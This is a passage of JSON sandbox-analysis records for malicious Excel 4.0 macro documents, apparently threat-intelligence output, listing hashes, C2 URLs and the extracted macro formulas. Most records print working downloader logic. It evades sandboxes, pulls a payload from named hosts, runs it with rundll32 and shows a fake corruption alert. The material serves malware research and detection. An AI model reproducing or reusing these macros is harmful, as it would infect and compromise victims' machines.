\u003c0,CLOSE(FALSE),)\nEXEC(\"c:\\Users\\Public\\asd2asff32.exe\")\nALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)\nCLOSE(FALSE)\nWORKBOOK.HIDE(\"vsjYmRYAlw\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2e3c80ff1c833a85df6fac70f883d4de102cabd32b0d614bdecef79e00c50188"},"analysis":{"reported":"2020-04-09T16:15:34Z","score":10},"files":[{"filename":"2e3c80ff1c833a85df6fac70f883d4de102cabd32b0d614bdecef79e00c50188","filesize":185344,"md5":"83b6e85f55d1d7305853878da2550bfc","sha1":"1cfd764e36b4ad8163f8e425dc448f0a85d2b1d2","sha256":"2e3c80ff1c833a85df6fac70f883d4de102cabd32b0d614bdecef79e00c50188","sha512":"6e7201608b85d325a7dddfdbd71172848a54af3e2e5c45132f2916fe6c493c416f6a628d5c038e023a9b76b7c052d4dd9556d281b5b4301906cf237d973833d4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2e3c80ff1c833a85df6fac70f883d4de102cabd32b0d614bdecef79e00c50188.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2e49be93a37239141ff3179ac30a7edeb5ad188cd998de21c586ac8e143fccca"},"analysis":{"reported":"2020-04-09T16:15:34Z","score":10},"files":[{"filename":"2e49be93a37239141ff3179ac30a7edeb5ad188cd998de21c586ac8e143fccca","filesize":206336,"md5":"8191670f70dadc305ec465ee675bcb45","sha1":"abcd8522c342fdba559a442375a379c26ef3bb01","sha256":"2e49be93a37239141ff3179ac30a7edeb5ad188cd998de21c586ac8e143fccca","sha512":"33dc9ebcf4d09ecd4f6449ff1ea3c9aa4cb59ff6bee3b61d2f29c4588a05775b1f732f58b4f6cec47ec8002c3c1face57545d56c02c5569c9d4dd6451ce29c1e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2e49be93a37239141ff3179ac30a7edeb5ad188cd998de21c586ac8e143fccca.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"EEIDbEopky\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2e5a56bc191b5f52845019c29a9f6a53df9933cab54c746d2fd6ad79c875eb7a"},"analysis":{"reported":"2020-04-09T16:15:34Z","score":10},"files":[{"filename":"2e5a56bc191b5f52845019c29a9f6a53df9933cab54c746d2fd6ad79c875eb7a","filesize":167936,"md5":"564ce48136675b83239568b1b5bd93fb","sha1":"0ed3918e99e9ed77464728aa9103e87b809df2cb","sha256":"2e5a56bc191b5f52845019c29a9f6a53df9933cab54c746d2fd6ad79c875eb7a","sha512":"322e0efc8c15172b11cbc1111f4324607959d5520453c17396d438729122505d17aebe96ebd7cc58a1970ba37711f06c228b6cff4ceb3165297198375807cb0d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2e5a56bc191b5f52845019c29a9f6a53df9933cab54c746d2fd6ad79c875eb7a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"lhSyJFVxDC\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2e65d125e5639bf642ddb29950589153d3fa0e9a3d49eefd019835f374e8d217"},"analysis":{"reported":"2020-04-09T16:15:34Z","score":10},"files":[{"filename":"2e65d125e5639bf642ddb29950589153d3fa0e9a3d49eefd019835f374e8d217","filesize":168448,"md5":"5d361a27747af977e476d9175d5b491d","sha1":"4e8a8d481aadd2b72d2a0ce15432e331651c3566","sha256":"2e65d125e5639bf642ddb29950589153d3fa0e9a3d49eefd019835f374e8d217","sha512":"0b98f93ab65f84f3b11e35cdae16fe62cceb64cd58bf1f921eb9d723f09170ea4741caf2f396523d633beced03f805ab97dfc0e476ff7997384a7d20f50c8f86","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2e65d125e5639bf642ddb29950589153d3fa0e9a3d49eefd019835f374e8d217.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"e6VrJo3w31\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2e7e65e8b7c94d5e38aeee0325a4ed01abf498ff4cd43cd55a84180b93ed8ca2"},"analysis":{"reported":"2020-04-09T16:15:34Z","score":10},"files":[{"filename":"2e7e65e8b7c94d5e38aeee0325a4ed01abf498ff4cd43cd55a84180b93ed8ca2","filesize":167424,"md5":"778baea6322680169c711116793bfda3","sha1":"282969ae59c6d4ef03a8b0f874181a705462ca41","sha256":"2e7e65e8b7c94d5e38aeee0325a4ed01abf498ff4cd43cd55a84180b93ed8ca2","sha512":"b2a4a3d7dfea58bfa3d79fdf45d68f13c3ccc2578f90da8f59c5beb03c6c53f149a98d5ee1a234380871c45bf82126225ed5778a07827e689848097d4c7c8996","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2e7e65e8b7c94d5e38aeee0325a4ed01abf498ff4cd43cd55a84180b93ed8ca2.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/fgwg24g24g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"E3nIMQ2faY\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$18C$2\u003c770,CLOSE(FALSE),)\nIF(R$19C$2\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$39C$10)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2ea79f6f7f60037ee472599e83f713efe080b9bf79d660d5814e3c218dd8ed0c"},"analysis":{"reported":"2020-04-09T16:15:34Z","score":10},"files":[{"filename":"2ea79f6f7f60037ee472599e83f713efe080b9bf79d660d5814e3c218dd8ed0c","filesize":206336,"md5":"1f5a8fc347d3eb039f3e541a0adc7e23","sha1":"fce420413cd42bca0db44f96ceb1bc796201c602","sha256":"2ea79f6f7f60037ee472599e83f713efe080b9bf79d660d5814e3c218dd8ed0c","sha512":"d93ab7d63d750f05f232b5454be1b0b591f2446073f3c5ef07f281359268cf6025b052f4cd89b95470049ddf6e7c424fa6ed54c913b234489c2c7a678c5dac6b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2ea79f6f7f60037ee472599e83f713efe080b9bf79d660d5814e3c218dd8ed0c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"kE2WghWn5Y\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2eb2327468929224acd7ddb3513a894511b628d43c995fea28a3bf08b261bf3d"},"analysis":{"reported":"2020-04-09T16:15:34Z","score":10},"files":[{"filename":"2eb2327468929224acd7ddb3513a894511b628d43c995fea28a3bf08b261bf3d","filesize":168448,"md5":"3ccaafe51016232a0fc8bdabee58a33f","sha1":"f795d3e085bb1b3544354e09e880c439423ef6d6","sha256":"2eb2327468929224acd7ddb3513a894511b628d43c995fea28a3bf08b261bf3d","sha512":"0da50d936043adcafaf1f0469b4748641bf87a532c399fc6365ebec39ffb9ab57684c9654819e15e6855055b16730d5c3af0aebc782a1774db06cba838765d5b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2eb2327468929224acd7ddb3513a894511b628d43c995fea28a3bf08b261bf3d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"3A0r2ktwcx\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2eb54728a4e70a03d1ad1d85865f8bf84b9272456b61ccba39091c1f986605d2"},"analysis":{"reported":"2020-04-09T16:15:34Z","score":10},"files":[{"filename":"2eb54728a4e70a03d1ad1d85865f8bf84b9272456b61ccba39091c1f986605d2","filesize":206336,"md5":"ef2269f6ade4066317e66cd5a7db6705","sha1":"f19329c267ab89ce2207af6fedcdee95f3b5e518","sha256":"2eb54728a4e70a03d1ad1d85865f8bf84b9272456b61ccba39091c1f986605d2","sha512":"a545eed16b8e0929a0be49e06c9ffb74e30ee013ab3923430105686f8c6f887aa7b07e49ae27e20731f83b9f7c832bd14b6afdebde03548e0d2742951781194b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2eb54728a4e70a03d1ad1d85865f8bf84b9272456b61ccba39091c1f986605d2.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"tOdvKHJ12J\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2ec89d78411c4c6a3f13806be30dd70cbd14d9c119886682234a908650799f29"},"analysis":{"reported":"2020-04-09T16:15:34Z","score":10},"files":[{"filename":"2ec89d78411c4c6a3f13806be30dd70cbd14d9c119886682234a908650799f29","filesize":104448,"md5":"d958f626acc05eb1a2bb51264e9af6a8","sha1":"74b2c66c1b771a89c1a4ac03f99825a8c84c021b","sha256":"2ec89d78411c4c6a3f13806be30dd70cbd14d9c119886682234a908650799f29","sha512":"00868b0e668e61cb65a9c41872609f46877654fa5ebf2d625188e90f430e956fef599f7c7ab50db3428822cdd613bc2e442f8f5829a50fdc60de501a73c9e8f5","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2ec89d78411c4c6a3f13806be30dd70cbd14d9c119886682234a908650799f29.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"9Z4tORqDYB\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2ed7e07b3fbef646df88f28696ec4ea08cea791c1f0d957f7980657e33c1dfed"},"analysis":{"reported":"2020-04-09T16:15:34Z","score":10},"files":[{"filename":"2ed7e07b3fbef646df88f28696ec4ea08cea791c1f0d957f7980657e33c1dfed","filesize":167936,"md5":"67e9371a9ed94511a1f04f2c3762a90b","sha1":"c292fef4633818bb00c39e79c48677ed9157e119","sha256":"2ed7e07b3fbef646df88f28696ec4ea08cea791c1f0d957f7980657e33c1dfed","sha512":"5415334d35f194e5831b59b3f8cc78c485338580198eb835c0918f47c4718ad32221a50672caf63540065cf6d2a44118b1c1b6ad5baf6c08d0ab273c1c4e59a7","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2ed7e07b3fbef646df88f28696ec4ea08cea791c1f0d957f7980657e33c1dfed.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"35guzNWlUZ\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2edcdd5ce6d12ad2151863dd2df36471af463ca1cd0ff269850503831ceb500f"},"analysis":{"reported":"2020-04-09T16:15:34Z","score":10},"files":[{"filename":"2edcdd5ce6d12ad2151863dd2df36471af463ca1cd0ff269850503831ceb500f","filesize":112128,"md5":"e158b8a12415b13067de53b040c15797","sha1":"d78fc27c56cfe43ba2b1269b288083dad1986cea","sha256":"2edcdd5ce6d12ad2151863dd2df36471af463ca1cd0ff269850503831ceb500f","sha512":"1cc99eacfbc296de99f653175b827d2269c78cf9fb9029cb29700afb48555e221cea272dffd59eda5b9edc929f436ed83df38cdf2578853bd2de747732a08d2e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2edcdd5ce6d12ad2151863dd2df36471af463ca1cd0ff269850503831ceb500f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2ee2221f65c537ed6e6c2ff760c010a68ae28bb6eb8e3133f263399a3e7626f2"},"analysis":{"reported":"2020-04-09T16:15:34Z","score":10},"files":[{"filename":"2ee2221f65c537ed6e6c2ff760c010a68ae28bb6eb8e3133f263399a3e7626f2","filesize":221184,"md5":"a7cb07bccb1e3ae9c0143c3ef27ce926","sha1":"4cf80a70ca92714f3b4bf8dd04797cfe4a5ee447","sha256":"2ee2221f65c537ed6e6c2ff760c010a68ae28bb6eb8e3133f263399a3e7626f2","sha512":"9779313d81578978e116b14caa742be800a6d047bfd356159bb2695cdfe538dcee78901fe862cf1ff842d9f2afb45a52f08a8ebf918db4ab33489d8c59da28ee","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2ee2221f65c537ed6e6c2ff760c010a68ae28bb6eb8e3133f263399a3e7626f2.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://efbzfyvsb.website/f2f23"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-4]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-4]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://efbzfyvsb.website/f2f23\",\"c:\\Users\\Public\\b7gf5yk.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5yk.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"A55L5qvGJ1\",TRUE)\nGOTO(R$3C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2eec70d6c92b497c4f934c579e78f62e4427c5bf4de2e1439eaa9de416daf439"},"analysis":{"reported":"2020-04-09T16:15:34Z","score":10},"files":[{"filename":"2eec70d6c92b497c4f934c579e78f62e4427c5bf4de2e1439eaa9de416daf439","filesize":168448,"md5":"1148e6358b2cf8dd5e9c44d514878138","sha1":"fd4fe00c2cdcc63db6eea8ff458581b5f96a4f28","sha256":"2eec70d6c92b497c4f934c579e78f62e4427c5bf4de2e1439eaa9de416daf439","sha512":"513f7dc79a729c24a19984b86fd8035e88097125582aa1e373819da4856c0e0211d420e782b7d1a037747908cc07f1f4aef33801d62424fafefa1258647db962","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2eec70d6c92b497c4f934c579e78f62e4427c5bf4de2e1439eaa9de416daf439.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"rsRg4YhG8v\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2efa8e97666a428321c018b37da0b8231162f37b82aca4f69207911fdb7831c5"},"analysis":{"reported":"2020-04-09T16:15:34Z","score":10},"files":[{"filename":"2efa8e97666a428321c018b37da0b8231162f37b82aca4f69207911fdb7831c5","filesize":170496,"md5":"342a73693186e224758aa441e284fbb3","sha1":"1df97a2fa6c3e97f9cd6b27f771c2f78b494eb5d","sha256":"2efa8e97666a428321c018b37da0b8231162f37b82aca4f69207911fdb7831c5","sha512":"64e44415e9e91c91a4c7dc61cbff26cf55dfadd2bcf0c8fc9864562f83b427f65c5827de98da52f52d4fd2ea97a4463a301877174d6a676502a95330e6597a32","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2efa8e97666a428321c018b37da0b8231162f37b82aca4f69207911fdb7831c5.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"4A6LAvFjb6\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2f0534d807e7bd269e5151bbca3d5a885b5e186f9a2533643ecada019ea43458"},"analysis":{"reported":"2020-04-09T16:15:35Z","score":10},"files":[{"filename":"2f0534d807e7bd269e5151bbca3d5a885b5e186f9a2533643ecada019ea43458","filesize":160768,"md5":"7a4bc344099006ca0c835cf79b07f3f4","sha1":"1b7490a8f35d57a4b1f5bbaa1ad6d643e74f7430","sha256":"2f0534d807e7bd269e5151bbca3d5a885b5e186f9a2533643ecada019ea43458","sha512":"ee60aedcd51bc2a5d07617368343d5f6d75fef01d459866afaa621e1cddb351905c627dbcf7ce4bd5a3db436ba51237772968042236da1feff4101e2bc259bbd","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2f0534d807e7bd269e5151bbca3d5a885b5e186f9a2533643ecada019ea43458.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, 